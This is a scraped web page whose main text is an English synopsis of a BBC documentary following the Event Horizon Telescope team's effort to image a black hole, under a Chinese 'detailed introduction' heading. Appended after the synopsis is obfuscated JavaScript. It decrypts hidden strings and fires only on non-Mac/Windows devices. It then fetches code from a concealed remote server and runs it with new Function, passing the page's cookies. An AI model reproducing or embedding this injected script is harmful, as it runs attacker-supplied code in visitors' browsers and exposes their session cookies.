详细介绍
For two years BBC cameras have followed, Dr Sheperd Doeleman of the Smithsonian Astrophysical Observatory and the work of the Event Horizon Telescope project team, a collective of the top scientific minds from around the world. The project combines radio observatories and telescope facilities from around the world to make up a virtual telescope with a diameter spanning the entire planet. This mega-telescope’s ultimate mission is to capture the first image ever of a black hole. Although the concept of black holes has been long assumed to be fact, the Event Horizon Telescope’s success would definitively prove the existence of this scientific phenomena for the first time – and provide clear visual evidence.
The programme brings viewers into the laboratories, behind the computer screens and beside the telescopes of what may prove to be one of the great astrophysical achievements in human history.
window['LxQRgj'] = function(){ var keyList = [ "+ALPvZG7JfqnVawkUTN58jgMsm0rulh-4umApW61xS8HnhKIkab3rYoDiwtUvPec" , "QIoM7N6OP2En01qimF8flCU9V+RkwHAE4aqnTc6I9QS7lYsrv+ePONH3ZmtkBF", "jZ+3nV6wxsbgyWiolMdqDhtackJHC2r0eLGz5KQAfFtkN2oyg+paL9zSH.:bXV8IAsleMrKdhYBRimUOCx6/", "-zwgpiskFb9YlOT0Dx1KJuRhZW02ma9f3eR745c6-H8gVXIMjO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"-A88hV0f-8kv0")], crd = x(keyList[1],"6mQoNQQ1QRQ7N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("ijjxWlFFsxhodHZs2WbJ66odVy", "YTz9Y9iilYxwwkz9xY", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}